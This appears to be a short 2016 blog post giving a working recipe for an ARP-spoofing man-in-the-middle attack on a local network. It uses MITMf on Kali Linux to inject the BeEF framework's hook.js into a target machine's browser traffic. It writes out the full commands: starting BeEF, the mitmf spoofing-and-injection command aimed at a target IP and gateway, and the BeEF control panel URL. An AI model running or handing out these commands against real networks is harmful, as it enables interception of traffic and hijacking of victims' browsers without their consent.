Freitag, 22. Januar 2016

MITMf and hook.js of the beef framework

This post is about arp poisining the local network with the mitmf which is already in the standard repositories of kali linux and can be inistalled via apt-get. First we need to start beef :
 /usr/share/beef-xss/beef   
Open a new terminal and start the man-in-the-middle attack with mitmf as follows :
 mitmf --spoof --arp -i eth0 --gateway 192.168.0.1 --target 192.168.0.30 --inject --js-url http://192.168.0.56:3000/hook.js^  
I think this is more or less self explained. The --js-url parameter url you can find in the output of the beef framework. (take a look at the picture above). Now you can open the beef gui which is a webfrontend and the url you can also find in the terminal, in this case :
 http://192.168.0.56:3000/ui/panel  
That's it!